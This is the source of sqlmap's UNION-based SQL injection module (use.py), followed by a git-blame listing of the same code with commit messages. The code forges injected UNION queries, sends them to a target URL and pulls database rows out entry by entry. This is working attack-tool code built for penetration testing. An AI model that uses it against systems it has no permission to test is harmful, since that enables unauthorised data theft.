sqlmap/lib/techniques/inband/union/use.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import re
import time

from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.techniques.inband.union.test import unionTest
from lib.utils.resume import resume

reqCount = 0

def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullChar=None, unpack=True, dump=False):
    """
    This function tests for an inband SQL injection on the target
    url then call its subsidiary function to effectively perform an
    inband SQL injection on the affected url
    """

    count      = None
    origExpr   = expression
    start      = time.time()
    startLimit = 0
    stopLimit  = None
    test       = True
    value      = ""

    global reqCount

    if resetCounter:
        reqCount = 0

    if not kb.unionTest:
        unionTest()

    if not kb.unionCount:
        return

    # Prepare expression with delimiters
    if unescape:
        expression = agent.concatQuery(expression, unpack)
        expression = unescaper.unescape(expression)

    if kb.unionNegative and not direct:
        _, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)

        # We have to check if the SQL query might return multiple entries
        # and in such case forge the SQL limiting the query output one
        # entry per time
        # NOTE: I assume that only queries that get data from a table can
        # return multiple entries
        if " FROM " in expression:
            limitRegExp = re.search(queries[kb.dbms].limitregexp.query, expression, re.I)

            if limitRegExp:
                if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):
                    limitGroupStart = queries[kb.dbms].limitgroupstart.query
                    limitGroupStop  = queries[kb.dbms].limitgroupstop.query

                    if limitGroupStart.isdigit():
                        startLimit = int(limitRegExp.group(int(limitGroupStart)))

                    stopLimit = limitRegExp.group(int(limitGroupStop))
                    limitCond = int(stopLimit) > 1

                elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):
                    limitGroupStart = queries[kb.dbms].limitgroupstart.query
                    limitGroupStop  = queries[kb.dbms].limitgroupstop.query

                    if limitGroupStart.isdigit():
                        startLimit = int(limitRegExp.group(int(limitGroupStart)))

                    stopLimit = limitRegExp.group(int(limitGroupStop))
                    limitCond = int(stopLimit) > 1

                elif kb.dbms == DBMS.ORACLE:
                    limitCond = False
            else:
                limitCond = True

            # I assume that only queries NOT containing a "LIMIT #, 1"
            # (or similar depending on the back-end DBMS) can return
            # multiple entries
            if limitCond:
                if limitRegExp:
                    stopLimit = int(stopLimit)

                    # From now on we need only the expression until the " LIMIT "
                    # (or similar, depending on the back-end DBMS) word
                    if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):
                        stopLimit += startLimit
                        untilLimitChar = expression.index(queries[kb.dbms].limitstring.query)
                        expression = expression[:untilLimitChar]

                    elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):
                        stopLimit += startLimit
                elif dump:
                    if conf.limitStart:
                        startLimit = conf.limitStart
                    if conf.limitStop:
                        stopLimit = conf.limitStop

                if not stopLimit or stopLimit <= 1:
                    if kb.dbms == DBMS.ORACLE and expression.endswith("FROM DUAL"):
                        test = False
                    else:
                        test = True

                if test:
                    # Count the number of SQL query entries output
                    countFirstField   = queries[kb.dbms].count.query % expressionFieldsList[0]
                    countedExpression = origExpr.replace(expressionFields, countFirstField, 1)

                    if re.search(" ORDER BY ", expression, re.I):
                        untilOrderChar = countedExpression.index(" ORDER BY ")
                        countedExpression = countedExpression[:untilOrderChar]

                    count = resume(countedExpression, None)

                    if not stopLimit:
                        if not count or not count.isdigit():
                            output = unionUse(countedExpression, direct=True)

                            if output:
                                count = parseUnionPage(output, countedExpression)

                        if count and count.isdigit() and int(count) > 0:
                            stopLimit = int(count)

                            infoMsg  = "the SQL query used returns "
                            infoMsg += "%d entries" % stopLimit
                            logger.info(infoMsg)

                        elif count and not count.isdigit():
                            warnMsg  = "it was not possible to count the number "
                            warnMsg += "of entries for the used SQL query. "
                            warnMsg += "sqlmap will assume that it returns only "
                            warnMsg += "one entry"
                            logger.warn(warnMsg)

                            stopLimit = 1

                        elif ( not count or int(count) == 0 ):
                            warnMsg  = "the SQL query used does not "
                            warnMsg += "return any output"
                            logger.warn(warnMsg)

                            return

                    elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
                        warnMsg  = "the SQL query used does not "
                        warnMsg += "return any output"
                        logger.warn(warnMsg)

                        return

                    for num in xrange(startLimit, stopLimit):
                        if kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):
                            field = expressionFieldsList[0]
                        elif kb.dbms == DBMS.ORACLE:
                            field = expressionFieldsList
                        else:
                            field = None

                        limitedExpr = agent.limitQuery(num, expression, field)
                        output = resume(limitedExpr, None)

                        if not output:
                            output = unionUse(limitedExpr, direct=True, unescape=False)

                        if output:
                            value += output
                            parseUnionPage(output, limitedExpr)

                        if conf.verbose in (1, 2):
                            length = stopLimit - startLimit
                            count = num - startLimit + 1
                            status = '%d/%d entries (%d%s)' % (count, length, round(100.0*count/length), '%')
                            dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), status), True)

                    clearConsoleLine(True)
                    return value

        value = unionUse(expression, direct=True, unescape=False)

    else:
        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(expression, nullChar=nullChar)
        payload = agent.payload(newValue=query)

        debugMsg = "query: %s" % query
        logger.debug(debugMsg)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)
        reqCount += 1

        if kb.misc.start not in resultPage or kb.misc.stop not in resultPage:
            return

        # Parse the returned page to get the exact inband
        # sql injection output
        startPosition = resultPage.index(kb.misc.start)
        endPosition = resultPage.rindex(kb.misc.stop) + len(kb.misc.stop)
        value = getUnicode(resultPage[startPosition:endPosition])

        duration = calculateDeltaSeconds(start)

        debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
        logger.debug(debugMsg)

    return value
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`import re`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`import time`

			`from lib.core.agent import agent`
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`from lib.core.common import calculateDeltaSeconds`
added progress into union based entry retrieval 2011-01-06 12:10:20 +03:00			`from lib.core.common import clearConsoleLine`
			`from lib.core.common import dataToStdout`
more unicode refactoring 2010-06-02 16:45:40 +04:00			`from lib.core.common import getUnicode`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.core.common import parseUnionPage`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.request.connect import Connect as Request`
			`from lib.techniques.inband.union.test import unionTest`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.utils.resume import resume`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`reqCount = 0`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullChar=None, unpack=True, dump=False):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This function tests for an inband SQL injection on the target`
			`url then call its subsidiary function to effectively perform an`
			`inband SQL injection on the affected url`
			`"""`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`count = None`
			`origExpr = expression`
			`start = time.time()`
			`startLimit = 0`
			`stopLimit = None`
			`test = True`
			`value = ""`

			`global reqCount`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if resetCounter:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`reqCount = 0`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Added --union-cols switch to specify the max number of columns to test for UNION query sql injection. Now stores/resumes also the exact UNION payload to session file. 2010-11-14 02:24:41 +03:00			`if not kb.unionTest:`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`unionTest()`

			`if not kb.unionCount:`
			`return`

			`# Prepare expression with delimiters`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`if unescape:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`expression = agent.concatQuery(expression, unpack)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`expression = unescaper.unescape(expression)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Got rid of UNION false cond 2010-12-05 19:16:15 +03:00			`if kb.unionNegative and not direct:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`# We have to check if the SQL query might return multiple entries`
			`# and in such case forge the SQL limiting the query output one`
			`# entry per time`
			`# NOTE: I assume that only queries that get data from a table can`
			`# return multiple entries`
			`if " FROM " in expression:`
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`limitRegExp = re.search(queries[kb.dbms].limitregexp.query, expression, re.I)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`if limitRegExp:`
minor cosmetics 2010-12-04 01:28:09 +03:00			`if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):`
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`limitGroupStart = queries[kb.dbms].limitgroupstart.query`
			`limitGroupStop = queries[kb.dbms].limitgroupstop.query`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`if limitGroupStart.isdigit():`
			`startLimit = int(limitRegExp.group(int(limitGroupStart)))`

			`stopLimit = limitRegExp.group(int(limitGroupStop))`
			`limitCond = int(stopLimit) > 1`

update regarding Sybase syntax 2010-12-22 13:39:56 +03:00			`elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):`
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`limitGroupStart = queries[kb.dbms].limitgroupstart.query`
			`limitGroupStop = queries[kb.dbms].limitgroupstop.query`
Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection 2009-01-03 02:26:45 +03:00
			`if limitGroupStart.isdigit():`
			`startLimit = int(limitRegExp.group(int(limitGroupStart)))`

			`stopLimit = limitRegExp.group(int(limitGroupStop))`
			`limitCond = int(stopLimit) > 1`

refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`elif kb.dbms == DBMS.ORACLE:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`limitCond = False`
			`else:`
			`limitCond = True`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# I assume that only queries NOT containing a "LIMIT #, 1"`
			`# (or similar depending on the back-end DBMS) can return`
			`# multiple entries`
			`if limitCond:`
			`if limitRegExp:`
			`stopLimit = int(stopLimit)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# From now on we need only the expression until the " LIMIT "`
			`# (or similar, depending on the back-end DBMS) word`
minor cosmetics 2010-12-04 01:28:09 +03:00			`if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`stopLimit += startLimit`
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`untilLimitChar = expression.index(queries[kb.dbms].limitstring.query)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`expression = expression[:untilLimitChar]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
update regarding Sybase syntax 2010-12-22 13:39:56 +03:00			`elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):`
Fixed custom MSSQL "limited" query support also for Partial UNION query technique 2009-01-03 03:27:04 +03:00			`stopLimit += startLimit`
Minor bug fix to consider --start and --stop also in partial UNION query SQL injection 2010-04-30 19:48:40 +04:00			`elif dump:`
			`if conf.limitStart:`
			`startLimit = conf.limitStart`
			`if conf.limitStop:`
			`stopLimit = conf.limitStop`
Fixed custom MSSQL "limited" query support also for Partial UNION query technique 2009-01-03 03:27:04 +03:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`if not stopLimit or stopLimit <= 1:`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE and expression.endswith("FROM DUAL"):`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`test = False`
			`else:`
			`test = True`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if test:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# Count the number of SQL query entries output`
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`countFirstField = queries[kb.dbms].count.query % expressionFieldsList[0]`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`countedExpression = origExpr.replace(expressionFields, countFirstField, 1)`

			`if re.search(" ORDER BY ", expression, re.I):`
			`untilOrderChar = countedExpression.index(" ORDER BY ")`
			`countedExpression = countedExpression[:untilOrderChar]`

			`count = resume(countedExpression, None)`

			`if not stopLimit:`
			`if not count or not count.isdigit():`
			`output = unionUse(countedExpression, direct=True)`

			`if output:`
			`count = parseUnionPage(output, countedExpression)`

			`if count and count.isdigit() and int(count) > 0:`
			`stopLimit = int(count)`

minor language update (in testing phase "used" is more preferable than "provided") 2010-11-23 18:11:15 +03:00			`infoMsg = "the SQL query used returns "`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`infoMsg += "%d entries" % stopLimit`
			`logger.info(infoMsg)`

Minor adjustments and bug fixes 2008-12-17 23:11:18 +03:00			`elif count and not count.isdigit():`
			`warnMsg = "it was not possible to count the number "`
minor language update (in testing phase "used" is more preferable than "provided") 2010-11-23 18:11:15 +03:00			`warnMsg += "of entries for the used SQL query. "`
Minor adjustments and bug fixes 2008-12-17 23:11:18 +03:00			`warnMsg += "sqlmap will assume that it returns only "`
			`warnMsg += "one entry"`
			`logger.warn(warnMsg)`

			`stopLimit = 1`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`elif ( not count or int(count) == 0 ):`
minor language update (in testing phase "used" is more preferable than "provided") 2010-11-23 18:11:15 +03:00			`warnMsg = "the SQL query used does not "`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`warnMsg += "return any output"`
			`logger.warn(warnMsg)`

			`return`

			`elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):`
minor language update (in testing phase "used" is more preferable than "provided") 2010-11-23 18:11:15 +03:00			`warnMsg = "the SQL query used does not "`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`warnMsg += "return any output"`
			`logger.warn(warnMsg)`

			`return`

			`for num in xrange(startLimit, stopLimit):`
update regarding Sybase syntax 2010-12-22 13:39:56 +03:00			`if kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):`
Fixes non-deterministic unsorted results for most of the DBMSes - see #185 2010-04-09 19:48:53 +04:00			`field = expressionFieldsList[0]`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`elif kb.dbms == DBMS.ORACLE:`
Minor bug fixes to --os-shell (altought web backdoor functionality still to be reviewed). Minor common library code refactoring. Code cleanup. Set back the default User-Agent to sqlmap for comparison algorithm reasons. Updated THANKS. 2009-04-28 03:05:11 +04:00			`field = expressionFieldsList`
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server 2008-12-22 22:36:01 +03:00			`else:`
Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server. 2008-12-23 01:48:44 +03:00			`field = None`
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server 2008-12-22 22:36:01 +03:00
			`limitedExpr = agent.limitQuery(num, expression, field)`
Minor bug fix to consider --start and --stop also in partial UNION query SQL injection 2010-04-30 19:48:40 +04:00			`output = resume(limitedExpr, None)`

			`if not output:`
			`output = unionUse(limitedExpr, direct=True, unescape=False)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`if output:`
			`value += output`
Minor bug fix to consider --start and --stop also in partial UNION query SQL injection 2010-04-30 19:48:40 +04:00			`parseUnionPage(output, limitedExpr)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
added progress into union based entry retrieval 2011-01-06 12:10:20 +03:00			`if conf.verbose in (1, 2):`
			`length = stopLimit - startLimit`
			`count = num - startLimit + 1`
			`status = '%d/%d entries (%d%s)' % (count, length, round(100.0*count/length), '%')`
			`dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), status), True)`

			`clearConsoleLine(True)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`return value`

			`value = unionUse(expression, direct=True, unescape=False)`

			`else:`
			`# Forge the inband SQL injection request`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`query = agent.forgeInbandQuery(expression, nullChar=nullChar)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`payload = agent.payload(newValue=query)`

Added one new verbose level, -v 3 now shows the full injected payload. Fixed also -d verbose output. 2010-11-08 01:34:29 +03:00			`debugMsg = "query: %s" % query`
			`logger.debug(debugMsg)`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# Perform the request`
Initial support to automatically work around the dynamic page at each refresh (Major refactor to the comparison algorithm (True/False response)) 2008-12-18 23:48:23 +03:00			`resultPage, _ = Request.queryPage(payload, content=True)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`reqCount += 1`

removed temp dictionary and replaced with kb.misc 2010-10-20 03:00:19 +04:00			`if kb.misc.start not in resultPage or kb.misc.stop not in resultPage:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`return`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# Parse the returned page to get the exact inband`
			`# sql injection output`
removed temp dictionary and replaced with kb.misc 2010-10-20 03:00:19 +04:00			`startPosition = resultPage.index(kb.misc.start)`
			`endPosition = resultPage.rindex(kb.misc.stop) + len(kb.misc.stop)`
more unicode refactoring 2010-06-02 16:45:40 +04:00			`value = getUnicode(resultPage[startPosition:endPosition])`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`duration = calculateDeltaSeconds(start)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)`
			`logger.debug(debugMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`return value`